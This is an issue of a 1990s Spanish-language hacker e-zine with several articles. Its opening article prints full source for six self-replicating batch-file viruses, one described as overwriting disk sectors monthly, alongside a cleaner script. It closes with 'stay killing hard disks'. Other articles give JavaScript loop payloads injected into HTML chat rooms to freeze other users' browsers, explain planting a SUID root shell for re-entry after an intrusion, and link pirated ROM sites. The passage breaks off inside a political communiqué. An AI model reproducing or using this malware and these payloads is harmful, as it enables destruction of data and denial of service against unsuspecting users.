RareGaZz10:(RARE010.TXT):12/12/1999 << Back To RareGaZz10

<<::RareGaZz::>> "CyberHerejes" Arkangel Azumlord Groovy |KillerBot Orion Vov_77| |GuyBrush RareTrip Mr.X| y ServerHacker.Team 1998 Edicion: RareGaZz Manual de Bolsillo electrico acondicionado y reforzado para ofrecer la libertad de palabra en internet. El contenido esta creado totalmente por personas ajenas a la editorial y su contenido es responsabilidad absoluta de los escritores que lo hacen de manera anonima y no existe manera de conocer sus identidades por lo que si no estas de acuerdo con los contenidos de RareGaZz borra el archivo de tu sistema y calla boca. Swoish. " En la ciudad de Mexico durante el Teleton: `¿Como estan?' -dice Lucero y retorciendose en sus sillas contesta la audiencia: `¡Discapacitados!' " °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ Aqui de nuevo amigos cybernautas despues de un largo tiempo de reposo debido a las fiestas navideñas y año nuevo. Queremos agradecer a los encargados del dominio acapulco.uagro.mx que nos han prestado un sub-dominio en http://raregazz.acapulco.uagro.mx asi como a los tipos fuertes de http://islatortuga.com que nos han dado sus servicios gratuitamente unicamen- te para ofrecer a ustedes este E-Zine. ahora algo maniaco: RareGaZz cumple un año en Febrero! Asi es, apenas estamos saliendo del cascaron pero esperamos mejorar en todo para los siguientes años. Ustedes pensaran: 10 numeros en un año?? Patetico! Y es cierto pero ¿que vamos a hacer? Por favor actualicen sus paginas linkeando a RareGaZz a esta direccion: http://www.visitweb.com/raregazz gracias. Disfruten es para ustedes . . R4r37r1P & R4r3g4Z2 734/\/\ -Hackeando tu sistema- y hasta pronto. °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ VIRUS BATCH ! 1/2 PERMISOS DE ARCHIVOS EN UNIX EMULADORES Y ROMS -LA ULTIMA AVENTURA- HACKEANDO CHAT ROOMS DE HTML COMUNICADO DEL EZLN SOBRE LA GUERRA EN CHIAPAS MEXICO COMO MANDAR MENSAJES GRATIS DESDE UN MOVIL DIGITAL SHELL ACCOUNTS DE UNIX GRATIS COMO USAR GLIDE (CON QUE Y PARA QUE) ANARQUIA...MAS SOBRE EL ARTE DE HERIR COSAS VIVIENTES ¿EXISTE LA ANONIMIDAD EN LA RED? NAVEGANDO ANONIMAMENTE -SERVIDORES PROXIES- COMANDO TOUCH DE UNIX LAS POSIBILIDADES EN WINDOWS NT -PRIMERA PARTE- MAS BICHOS EN INTERNET RELIGION Y OTRAS COSAS INSERVIBLES BUSCADORES EN INTERNET WORLD WIDE WEB = EL MERCADO MAS GRANDE DEL MUNDO UNIX SISTEM V INTERFACE DEFINITION (SVID) LA GUIA PARA JODER CUALQUIER AUTOMOVIL CRACKS - HACKS Y KAOS CON UN HEXEDITOR NOTI-LOONZ B 0 0 /\/\ 3 R 4 N G °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ ***************** * VIRUS BATCH ! * Por : -/| Yo Soy |\- ***************** PARTE 1 DE 2 Introduccion: Las personas generalmente creen que los virus batch no son una forma confiable de infectar. Bueno. Te dejo que opines tu mismo con esto, es cierto que unos virus no son chingones, pero aqui no es necesario saber de algun lenguaje de programacion, solo debes de saber hacer archivos .bat. :) Los virus se supone que son faciles de limpiar. :( Agarra un mendigo editor y orale ! Aqui te pongo 5 virus que me econtre por ahi. Se supone que si sirven. --------------------------- Caracteristicas --------------------------- * Infectan unicamente archivos batch que no esten protegidos. * No afectan el funcionamiento de los batch que infecta, se ejecutan normalmente, pero el virus toma control de el despues de que el batch acabo de hacer todas sus ejecuciones. * Se necesita Ms-Dos 5 o mayor ( no se... :) ------------------------------- LOS VIRUS ------------------------------- ZEP (165) - El virus mas pequeño hasta ahora. XOP (361) - Infecta 2 batchs por ejecucion. POT (685) - Infecta 1 batch por ejecucion, si no puede infectar ninguno, pone 2 bombas ANSI. SKUL (497) - Este es un virus PELIGROSO ! XD, es el que mas me ha gustado. Sobrescribe cerca de 8000 sectores del disco duro el dia 20 de cada mes. TEN CUIDADO! ( no juegues con fuego :) ZOP_B (615) - Infecta 2 batchs por ejecucion. No es muy impresionante no veras mucho despues de su ejecucion. Las bombas ANSI solo funcionaran si ANSI.SYS esta cargado en el memoria. Todos los virus excepto ZEP se mentienen con una copia en la raiz del disco duro. -------------------------------- ZEP.BAT ---------------------------------- @echo off%[ZeP]% if not exist %0.bat goto ZeP for %%f in (*.bat ..\*.bat) do set ZeP=%%f find /i "ZeP"<%ZeP%>nul if errorlevel 1 find "ZeP"<%0.bat>>%ZeP% :ZeP -------------------------------- XOP.BAT ---------------------------------- @echo off%[XoP]% if '%XoP%=='11 goto XoP2 if '%2=='_ goto XoP1 if exist C:\XoP.bat goto XoP if not exist %0.bat goto XoP2 find "XoP"<%0.bat>C:\XoP.bat attrib C:\XoP.bat +h :XoP for %%v in (*.bat ..\*.bat) do call C:\XoP %%v _ set XoP= goto XoP2 :XoP1 find /i "XoP"<%1>nul if not errorlevel 1 goto XoP2 type C:\XoP.bat>>%1 set XoP=%XoP%1 :XoP2 -------------------------------- POT.BAT ---------------------------------- @echo off%_PoT% if '%PoT%=='I goto PoTz if '%1=='_ goto PoTi if exist C:\PoT.bat goto PoT if not exist %0.bat goto PoTz find "PoT"<%0.bat>C:\PoT.bat attrib C:\PoT.bat +h :PoT Makes You Feel Goodz for %%f in (*.bat ..\*.bat C:\*.bat) do call C:\PoT.bat _ %%f if '%PoT%=='I goto PoTf set PoT= echo %PoT%[32;" Estas paralizado ! "p echo %PoT%[96;" C:\PoT";13p%PoT%[2A echo.%_PoT%|time|find "00">nul if errorlevel 1 goto PoTf echo %PoT%[1A%PoT%[s%PoT%[1;37;44m echo %PoT%[3;9H Dejame salir de aqui ! %PoT%[0m%PoT%[u :PoTf gold set PoT= goto PoTz :PoTi nfect find /i "PoT"<%2>nul if not errorlevel 1 goto PoTz type C:\PoT.bat>>%2 set PoT=I :PoTz ---------------------------------- SKUL ----------------------------------- :: [8mSKuL @echo off%[SKuL]% echo.|date|find "20">nul%[SKuL]% if errorlevel 1 goto SKuL1 echo SKuL Fregando el disco duro... ::echo ░ ╣ Ö═&═>SKuL.com ::SKuL :SKuL1 [6A2 if exist C:\SKuL goto SKuL2 if not exist %0.bat goto SKuL find "SKuL"<%0.bat>C:\SKuL attrib C:\SKuL +h :SKuL2 [5A set SKuL=C:\AUTOEXEC.BAT for %%f in (D:*.bat C:*.bat ..\*.bat) do set SKuL=%%f if not exist %SKuL% goto SKuL find /i "SKuL"<%SKuL%>nul if errorlevel 1 type C:\SKuL>>%SKuL% set SKuL= :SKuL [7A [0m -------------------------------- ZOP_B.BAT ---------------------------------- @echo off :: [8m --- [ZoP_B] Batch Infector --- if '%2=='ZoP_ goto ZoP_1 if '%1=='ZoP_ echo ["`";"`"p :: ["`";" ZoP_B ZoP_";13p :: [4AZoP_ if exist c:\ZoP_B.bat goto ZoP_ if not exist %0.bat goto ZoP_2 echo @echo Off>c:\ZoP_B.bat find "ZoP_"<%0.bat>>c:\ZoP_B.bat attrib c:\ZoP_B.bat +h :: [6AZoP_ :ZoP_ for %%v in (*.bat) do call c:\ZoP_B %%v ZoP_ if '%ZoP_%==' for %%v in (..\*.bat) do call c:\ZoP_B %%v ZoP_ set ZoP_= goto ZoP_2 :: [6AZoP_ :ZoP_1 if '%ZoP_%=='11 goto ZoP_2 find "ZoP_"<%1>nul if not errorlevel 1 goto ZoP_2 type c:\ZoP_B.bat>>%1 set ZoP_=%ZoP_%1 :ZoP_2 ::ZoP_ [7A [0m -------------------------------------------------------------------------- BATCH VIRUS REMOVER =================== Este archivo limpiara los virus batch de los que vimos atras en el documento. Basicamente, quita todas las lineas que contengan una cadena de caracteres especifica provista por el archivo. Es inecesario el decir que si lo llamas con la cadena de caracteres incorrecta reducira tus archivos batch a una puta mierda :) , asi que ten cuidado, si no tienes la necesidad de usarlo, mejor. Ha sido escrito para uso en Ms-Dos 6 o mayor, ( o por lo menos el arhivo CHOICE.COM ), es requerido porque el removedor pide la confirmacion de cada archivos antes de limpiarlo. Asi que tu no debes limpiar un archivo original si no estas seguro. Para usarlo, ( yo no lo he usado, asi que no me hago responsable :), determina que tipo de cadena de caracteres quieres limpiar, por ejemplo: Si yo tengo el un virus batch que contenga 'GreeZ' en cada linea ( aqui voy otra vez ) como lo siguiente: :: :: Archivo infectado :: ctty nul%_GeeZ% for %%a in (C:*.bat ..\*.bat) do set GeeZ=%%a find "GeeZ"<%GeeZ% if errorlevel 1 find "GeeZ"<%0.BAT>>%GeeZ% ctty con%_GeeZ% Para remover eso, solo pon "CLEANBAT GeeZ". ---------------------------- CLEANBAT.BAT ---------------------------------- @echo off if '%1=='%temp% goto remove if exist C:\DOS\CHOICE.COM goto start echo Este archivo necesita CHOICE.COM en C:\DOS! :start echo **** REMOVEDOR DE VIRUS BATCH **** echo. echo Cuidado! Si la llave no es unica destruira archivos! echo Sintax: CLEANBAT llave1 [llave2] donde llave1 es la llave echo UNICA que identificara al virus. echo. set ks=%1 set is=%2 if '%ks%==' goto exit if '%is%==' set is=%ks% if '%temp%==' set temp=C:\ echo Proceder a remover %ks% de archivos que contienen %is%. Si? choice /c:yn>nul if errorlevel 2 goto exit for %%v in (*.bat) do call %0 %temp% %%v if exist rem$$_ del rem$$_ goto exit :remove find "%is%"<%2>nul if errorlevel 1 goto done echo Found in %2 - remove? choice /c:yn>nul if errorlevel 2 goto done find /v "%ks%"<%2>rem$$_ copy rem$$_ %2>nul goto done :exit set is= set ks= :done Otra forma de limpiar archivos bat infectados por un virus batch es cargar el archivo en un editor ( como el edit de ms-dos ) e ir quitando las lineas añadidas al programa, recuerda que hay unos que tiene una copia la raiz con el atributo de ocultos, solo usa ATTRIB filename -s -r -h y eliminalos. Despedida: Ha ! Estos 5 virus se me hacen un poco pequeños y casi inofensivos. Este esta mejor, que lo disfruten... ----------------------( VIRUS MELT_ )------------------------------ @if not '%0==' if '%_melt%==' goto meltbeg ::---- dummy host -------- @echo off echo Hello World! ::---- end dummy host ---- @goto MeLTend [MeLT_2a] :MeLTbeg @echo off%_MeLT% if '%1=='MeLT goto MeLT%2 if not exist %comspec% set comspec=%_MeLT%command %comspec% /e:5000 /c %0 MeLT vir set MeLTcl=%1 %2 %3 %4 %5 %6 %7 %8 %9 call %0 MeLT rh set _MeLT= set MeLTcl= goto MeLTend :MeLTrh set _MeLT=x %0 %MeLTcl% :MeLTvir set MeLTH=%0 if not exist %_MeLT%%temp%\nul set temp=%tmp% if exist %temp%\MeLT_2a goto MeLTrun %0 MeLT fnd . %path% :MeLTfnd shift%_MeLT% if '%2==' exit MeLT set MeLT=%2\%MeLTH%.bat if not exist %MeLT% set MeLT=%2\%MeLTH% if not exist %MeLT% set MeLT=%2%MeLTH%.bat if not exist %MeLT% set MeLT=%2%MeLTH% if not exist %MeLT% goto MeLTfnd find "MeLT"<%MeLT%>%temp%\MeLT_2a attrib %temp%\MeLT_2a +h :MeLTrun %MeLTH% MeLT s . .. %path% :MeLTs shift%_MeLT% if '%2==' exit MeLT for %%a in (%2\*.bat %2*.bat) do call %MeLTH% MeLT inf %%a goto MeLTs :MeLTinf find /i "MeLT"<%3>nul if not errorlevel 1 goto MeLTno echo @if not '%%0==' if '%%_melt%%==' goto meltbeg>MeLT.t type %3>>MeLT.t echo.>>MeLT.t type %temp%\MeLT_2a>>MeLT.t move MeLT.t %3>nul exit MeLT :MeLTact - flash-melt screen text then put back to normal echo e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE>MeLT.t echo e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8>>MeLT.t echo e 120 B4 4C CD 21 00>>MeLT.t echo g>>MeLT.t debug<MeLT.t>nul del MeLT.t exit MeLT :MeLTno set MeLTC=%MeLTC%1 if %MeLTC%==1111111111 goto MeLTact :MeLTend ----------------------------( FIN )----------------------------------- Originalmente en : Batch file viruses tutor 1. Ok , eso es todo por hoy.... STAY KILLING HARD DISKS !! Traduccion y adaptado por: -/| Yo Soy |\- mierda@hotmail.com \/|R|| ! °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ PERMISOS Y PROPIETARIOS DE ARCHIVOS EN UNIX ============================================ Todos los archivos y directorios en los Unix's tienen propietarios y permisos, es la base de la seguridad de archivos del sistema. Se pueden cambiar los permisos y los propietarios para restar o agregar restricciones de acceso. Los permisos son tambien los que definen si un archivo se puede ejecutar como un comando. cuando tipeamos ls -l vemos algo como esto: -rwxr-x--- 1 vorax users 65 Dec 13 15:59 prueba* drwx------ 2 vorax users 1024 Dec 12 00:02 tmp/ El primer campo es el que indica los permisos (-rwxr-x---). Tambien vemos que "vorax" es el *usuario* propietario del archivo y "users" es el *grupo* propietario. /tmp es un directorio, el primer caracter de los permisos es una "d". Estos son los caracteres que pueden aparecer al principio de los permisos: Caracter Significado ┌───────────────────────────────────────────┐ │ - | Archivo comun │ │ d | Directorio │ │ b | Block Device (disco,CD-ROM,etc) │ │ l | Symbolic Link (BSD o V.4) │ │ s | Socket (BSD o V.4) │ │ = | FIFO (System V, Linux) │ └───────────────────────────────────────────┘ Los permisos se interpretan asi: Son 10 caracteres, si quitamos el primero que es el que indica el tipo de archivo nos quedan 9 que se agrupan de a tres: ┌────────────────────────────────────────┐ │ propietario grupo otros usuarios │ │ (owner) (group) (others) │ │ | rwx | | r-x | | --- | │ └────────────────────────────────────────┘ r= read-lectura w= write-escritura x=eXecute-ejecucion Con estos datos sabemos que el usuario propietario del archivo (owner) puede leer(r), escribir(w) y ejecutar(x). Los miembros del grupo propietario pueden leerlo(r) y ejecutarlo(x). Los otros usuarios no pueden hacer nada (---) En el caso del directorio (/tmp): (drwx------) En un directorio los caracteres se interpretan asi: r= Permite ver el contenido del directorio con ls. w= Se pueden crear, mover o borrar archivos dentro del directorio. x= Se puede acceder al directorio mediante cd. Lo mas comun para un directorio es r-x o rwx. Modo numerico ------------- Los permisos pueden representarse con tres numeros octales (base 8) (ej:664) y podemos usar el modo numerico para cambiar los permisos a un archivo. El primer digito indica los privilegios del propietario, el segundo los del grupo y el tercero los de los otros usuarios. Cada digito se obtiene sumando todos los privilegios (rwx) de cada propietario (owner,group,others): Cada privilegio es un bit de un grupo de 3, su valor posicional si valen 1: r=4 w=2 x=1 ┌────────────────────────┐ Volviendo a nuestro ejemplo (-rwxr-x---) │owner = rwx = 4+2+1 = 7 │ la codificacion numerica es 750 y este numero │group = r-x = 4+1 = 5 │ se obtiene de la forma que se muestra en la figura. │other = --- = 0 │ Si tomamos cada digito octal como un numero de tres │ 750│ digitos binarios. Y si consideramos que si el └────────────────────────┘ permiso esta habilitado es 1 y si no 0, entonces r-x seria 101 en binario, en decimal 4+0+1=5,y obtenemos un digito del permiso octal. Los mas comunes son : 0,1,4,5,6,7 y en los tres casos: 600 750 640 644 SUID: 4000 SGID: 2000 (ver mas adelante) CAMBIAR PERMISOS (comando chmod) -------------------------------- Cuando creamos un archivo nos convertimos en sus propietarios y podemos cambiar los permisos de este mediante el comando "chmod" <=SOLO EL PROPIETARIO PUEDE CAMBIAR LOS PERMISOS=> La sintaxis es: chmod <especificacion> archivo_o_directorio Hay dos formas de cambiar los permisos: en forma numerica o con codigos de letras. =Modo numerico= (en el prompt del UNIX) unix:~$ ls -l prueba -rwxr-x--- 1 vorax users 65 Dec 13 15:59 prueba* unix:~$chmod 511 prueba unix:~$ls -l prueba -r-x--x--x 1 vorax users 65 Dec 13 15:59 prueba* unix:~$chmod 710 prueba unix:~$ls -l prueba -rwx--x--- 1 vorax users 65 Dec 13 15:59 prueba* Aunque al principio puede parecer dificil, posiblemente el modo numerico sea el que mas uses. Arriba explico como se obtiene el numero. =Modo simbolico= La sintaxis es: chmod [ugoa...][=-+][rwxXstugo][...] pueden hacerse multiples operaciones simbolicas separadas por comas. 1) Primero debemos especificar que permisos queremos modificar mediante una letra: u= los del propietario (user) g= los del grupo (group) o= los de los otros (other) a= los de todos (ugo) 2) Debemos indicar si agregamos o sacamos un permiso, + y - respectivamente o si lo modificamos, signo = 3)Indicamos los permisos mediante el codigo de letras. Ejemplo, para agregar el permiso de lectura para el grupo y los otros: unix:~$ chmod go+r otros ejemplos : unix:~$ ls -l prueba -rwxr-x--- 1 vorax users 65 Dec 13 15:59 prueba* unix:~$ chmod u-w,g-r,o+x prueba unix:~$ ls -l prueba -r-x--x--x 1 vorax users 65 Dec 13 15:59 prueba* unix:~$ chmod u+w,o-x prueba unix:~$ ls -l prueba -rwx--x--- 1 vorax users 65 Dec 13 15:59 prueba* unix:~$chmod a+x,u-rw prueba unix:~$ ls -l prueba ---x--x--x 1 vorax users 5 Dec 13 15:59 prueba* NOTAS Estos comandos son equivalentes: chmod ugo+rx =igual a= chmod a+rx Se pueden usar comodines: chmod a-r *sec* (saca permiso de lectura a todos los archivos que tengan "sec" en su nombre: seco.txt casiseco.txt,etc) Varios archivos a la ves: chmod a+x zap.x wedit.x Recursivamente (como attrib /s en DOS) chmod a-r * -R (saca permiso de lectura a todos los archivos y directorio del directorio actual y subdirectorios) Si un directorio tiene permiso de escritura para todos (chmod o+w) cualquiera puede borrar los archivos que esten adentro sin importar los permisos. Cualquiera con permisos de lectura puede copiar el archivo. El propietario de la copia es el que la copio. Chmod no cambia los permisos de un link, si no del archivo al que este apunta. SUID y GUID =========== Hay casos en que un usuario comun necesita tener privilegios. Por ejemplo el programa passwd que permite cambiar el password de un un usuario necesita escribir en /etc/passwd, y un usuario comun no tiene privilegios para hacerlo. Para solucionar esto UNIX permite que un programa se 'encubra' bajo la identidad de su propietario, asumiendo un UID o GID distinto al del usuario que lo ejecuto. Un programa que puede hacer esto se denomina SUID o SGID. Cuando un programa SUID se ejecuta, el "effective UID" (EUID) es el del propietario del archivo, aunque el usuario que lo ejecuto sea otro. Si seteamos los bits de permiso suid o sgid a un archivo ejecutable, otros usuarios pueden tener acceso a los mismos recursos (mediante el ejecutable) que los propietarios reales. Ejemplo: el programa cat que se encuentra generalmente en /bin nos permite ver el contenido de un archivo al que tenemos acceso de lectura: unix:~$ cat /etc/passwd root:KQc4YhmF6pc6X:0:0:root:/root:/bin/bash bin:*:1:1:bin:/bin: [sigue] Los permisos normales de /bin/cat son: unix:~$ls -l /bin/cat -rwxr-xr-x 1 root bin 7737 Aug 6 1995 /bin/cat* SI SOMOS ROOT PODEMOS HACER ESTO: unix:~$chmod u+s /bin/cat (agregamos suid a /bin/cat) unix:~$ls -l /bin/cat -rwsr-xr-x 1 root bin 7737 Aug 6 1995 /bin/cat* ( ^-la x de ejecucion fue reemplazada por una "s") Entonces cada vez que un usuario usa "cat" toma momentaneamente la identidad de su propietario (root) por lo tanto puede leer cualquier archivo aunque no tenga permisos reales (si de Carlos) para hacerlo. :) Si seteamos suid un shell tenemos acceso de root como si entramos con login y password: (HAY QUE SER ROOT PARA HACER ESTO) unix:~$cp /bin/sh ./rootsh unix:~$chmod u+s rootsh unix:~$ls -l rootsh -rwsr-xr-x 1 root users 299649 Dec 13 18:56 rootsh* unix:~$rootsh unix:~# (somos root :) Si rootsh tuviera estos permisos: -rwsr-sr-x 1 juan clientes 299649 Dec 13 18:56 rootsh* Tomariamos la identidad de "juan" y el grupo "clientes", aunque realmente fueramos "carlos" del grupo "users". NOTAS Si encontramos un archivo suid escribible por nosotros es suficiente para ganarse el r00t. No les recomiendo dejar shells suid root en los lugares que hakean como forma para volver a entrar, muchas utilidades de seguridad los detectan y hay mejores metodos para asegurarse el reingreso. Estos comandos son equivalentes: chmod a+x,u+s =igual a= chmod 4111 chmod a+x,g+s =igual a= chmod 2111 chmod u+s,g+s =igual a= chmod 6111 Sticky Bit= si la ultima x de un archivo es un "t" el programa es Sticky. Esta permiso en archivos es obsoleto pero se usa en directorios. Este comando muestra todos los SUID find / -type f -perm +u+s -ls Si un archivo es SUID o SGID pero no ejecutable (!) se ve una S mayuscula prueben!. CAMBIAR PROPIETARIOS (chown,chgrp) --------------------------------- Para cambiar el grupo o usuario propietario de un archivo, se debe ser "dueño" del mismo, o root. Para cambiar el grupo se debe pertenecer a el. Sintaxis: Cambiar grupo : chgrp <grupo> archivo Cambiar 'owner': chown <usurio> archivo Ejemplos: unix:~$chown vorax .hosts_n (cambio el propietario del archivo .hosts_n) unix:~$chgrp users .hosts_n (cambio el grupo propietario del archivo) unix:~$chown vorax * (todos los archivos del directorio) unix:~$chown vorax .titbax prueba ckd.c (varios archivos) Si usamos los numeros UID o GID: unix:~$chown 501 .rare.txt (507 es el UID del usuario) unix:~$chgrp 100 .rare.txt (100 es GID del grupo) Todo junto: chown usuario:grupo archivo unix:~$chown juan:users juan.txt (setea usuario:grupo de una vez) unix:~$chown juan: (setea usuario y el grupo con el que esta logeado) Y todas las combinaciones posibles... Usen el comando id en cada uno de los ejemplos para entender mejor. =========================================================================== <VoraX> 12/97 Bs As °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ EMULADORES Y ROMS = la ultima aventura = Todos sabemos que en el mercado existen muchisimas consolas de videojuegos que permiten jugar y entrener un rato pero cada una de estas con marcadas diferencias. El caso de esto bien podria ser la comparacion entre el Sega Genesis y el Nintendo 64, muchos de nosotros hemos jugado o tenemos uno de estos aparatos pero ahora por internet, podemos tener los dos e incluso muchos mas como el primer nintendo, el super nintendo, ahora ya los CD's de playstation, Intellevision o la ultima consola de sega. Todas estas consolas estan disponibles en internet. Podemos usar estos sistemas gracias a los emuladores; aparatos que usando software simulan el ambiente de otra computadora o de otro lenguaje de programacion para ejecutar el codigo y ver los resultados en otro sistema que en este caso seria, tu pc. En un principio la emulacion era lenta y solo existian juegos para game boy (recuerdan tetris? :) pero gracias a programadores que empezaron a interesarse en la emulacion esta fue evolucionandose y lograr la emulacion rapida de casi cualquier juego incluso aquellos que necesitan hardware especial como el chip fx del star fox. Existen muchos emuladores que pueden conseguirse en internet para emular estos programas con diferencias en velocidad, sonido, etc. Ademas dependiendo de la computadora que tengas sera el juego. Por ejemplo no intentes ejecutar el emulador de Super Nintendo en una 486! NESticle 0.43 (nueva version disponible en la pagina de RareGaZz) Es el mejor emulador de el viejo Nintendo, debes tenerlo, la nueva version permite jugar por modem -version windows-. Genecyst es otro buen emulador de los creadores de Nesticle (BloodLust) este emulador es el mejor de Genesis. SNES9x con este programa podras jugar el Super Nintedo en tu PC pero con un sonido malo y lento en algo menos de Pentium. Los juegos o programas de estas consolas se conocen como ROMS y pueden ser encontrados por todo internet obviamente estos juegos tienen derechos de autor y por eso son ilegales. Nintendo comenzo a promorcionar los emuladores con restricciones tipo shareware y que podian ser usados por unicamente 24 horas o ser borrados, asi nacio la idea y si nintendo podia copiar los cartuchos a programas de PC, ¿por que no empezar a hacerlo? Algunos Links http://www.emulation.net/ Emulaciones para los Maqueros. http://www.media.dsi.unimi.it/mame/ Emuladores "Arcade" para juegos de maquinitas. http://www4.ncsu.edu/~bwmott/www/2600/ Roms y Emuladores de Atari 2600 http://www.users.zetnet.co.uk/ahornby/v2600.html Mas Atari 2600 http://www.general.uwa.edu.au/u/darrins/2600/welcome.html ...Atari 2600 http://www.geocities.com/SiliconValley/9461/emulate.htm Atari 5200 http://www.komkon.org/fms/ColEm/ Colecovision http://www.davesclassics.com/ Colecovision, etc. http://www.komkon.org/fms/iNES/ Nintendo http://users.uniserve.com/~thebrain/ Nintendo http://thunderstrike.simplenet.com/Roms/index.html Nintendo http://www.parallax.co.uk/%7Elmw/ Emuladores de Vectrex Bueno ahora que ya tienen a las grandes compañias de videojuegos por los huevos... a jugar. °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ HACKEANDO CHAT ROOMS DE HTML ──────────────────────────── que onda raza? Yo aqui, empezando en esto de la tecnologia. Alguien preguntaba en el numero 5, como tomar poder de algun chat. Encontre un par de scripts, que no he podido probar. Ahi les van: 1) <script language=javascript> for(i=1; i<2;){ alert("texto") }</script> 2) <script language=javascript>a=1; for(i=1; i<2;){a=a+1}</script> El numero dos lo que provoca es un bucle que se repite a si mismo un numero de veces determinado y que en tiempo se traduce en unos 30 ≤ 45 segundos dependiendo del procesador de la maquina. Transcurrido este tiempo volvera a salir otro mensaje esta vez del propio navegador y despues de este volvera a la normalidad. La ventaja de este programa es que mientras se esta leyendo el bucle, el ordenador queda totalmente inoperativo y no se puede hacer nada de nada. La desventaja es que en los futuros navegadores es posible que no se produzca este bucle, las razones son tecnicas y no creo que valga la pena explicarlas ademas del tiempo que nos llevaria. Y la otra desventaja es que dependiendo del sistema operativo que se use se puede anular este bucle manualmente. El numero uno lo que provoca es un bucle que se repite a si mismo e indefinidamente haciendo imposible que se pueda salir de el, por lo que el ordenador del usuario leera una y otra vez este bucle y no podra salir de el. En el lugar donde se pone el texto sera el mensaje que le saldra al usuario una y otra vez. Asi que sustituye el (texto) por el mensaje que quieras. La ventaja de este programa es que el funcionamiento esta casi garantizado ante la llegada de futuros navegadores mas modernos, y la desventaja (aunque yo no diria desventaja) es que el ordenador no queda totalmente inoperativo, lo unico que queda inoperativo es el navegador o la ventana del navegador. * IMPORTANTE: cuando escribas estos programas en el chat y pulses el boton de enviar, estos se ejecutaran a todos los usuarios que esten conectados (excepto en los chats que se pueden mandar a una sola persona) en cualquiera de los dos casos, estos programas tambien se ejecutaran en tu computadora, cosa que nos fastidiaria mucho porque tambien se nos bloquearia a el ordenador a nosotros, entonces lo que se puede hacer son muchas cosas, la mas sencilla es, o bien mirar en el Trumpet y vigilar a ver cuando nuestro mensaje es enviado por el modem (cosa un poco complicada si no se tiene un poco de idea), o bien pulsar el boton de "Enviar" propio del chat y esperar a que la pantalla se ponga en blanco (esto significa que se ha borrado toda la pantalla para cargarla de nuevo con los mensajes actualizados) entonces pulsar Stop. Un Saludo pa la banda y que les aproveche Filo [ Aqui en RareGaZz hemos probado los trucos con buenos resultados.En algunos chats fue necesario incluir la etiqueta </XMP> o </PRE> antes del codigo javascript. ] °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ Comunicado del Comite Clandestino Revolucionario Indigena Comandancia General del Ejercito Zapatista de Liberacion Nacional. Mexico. 23 de Diciembre de 1997. Al pueblo de Mexico; A los pueblos y gobiernos del mundo; A la prensa nacional e internacional; Hermanos: En relacion con la matanza de indigenas en la comunidad Acteal, municipio de San Pedro de Chenalho, Chiapas, realizada el dia de ayer, 22 de diciembre de 1997, el EZLN señala: Primero. De acuerdo a la informacion recabada hasta ahora, unos 60 paramilitares del Partido Revolucionario Institucional (patrocinados por los gobiernos federal y estatal) fueron los que atacaron con armas de grueso calibre a los indigenas desplazados que se encontraban refugiados en Acteal. Segundo. Como resultado de la agresion que duro hasta 4 horas, fueron asesinados cuando menos 45 indigenas, entre los que se cuentan 9 varones, 21 mujeres y 15 niños (uno de ellos menor de un año de edad). Ademas de los muertos, quedaron heridos 7 hombres (4 son niños) y 10 mujeres (4 de ellas son niñas). Tercero. De acuerdo a transmisiones radiales del Gobierno de Chiapas (interceptadas por el EZLN), en las inmediaciones de Acteal y al tiempo que se realizaba la masacre, policias de Seguridad 